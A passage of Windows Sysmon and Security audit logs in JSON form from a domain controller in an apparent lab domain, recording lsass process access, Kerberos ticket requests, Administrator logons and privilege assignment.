C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.422","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2547,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.422\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.422","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220371,"ProcessID":864,"ThreadID":1108,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A0BF\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a0bf","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2548,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220372,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220373,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220374,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220375,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A252\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a252","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{D65C3B12-F0AD-F3F8-A7DB-D3AB603729DE}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220376,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A252\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4a252","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2549,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2550,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.437\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 992\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 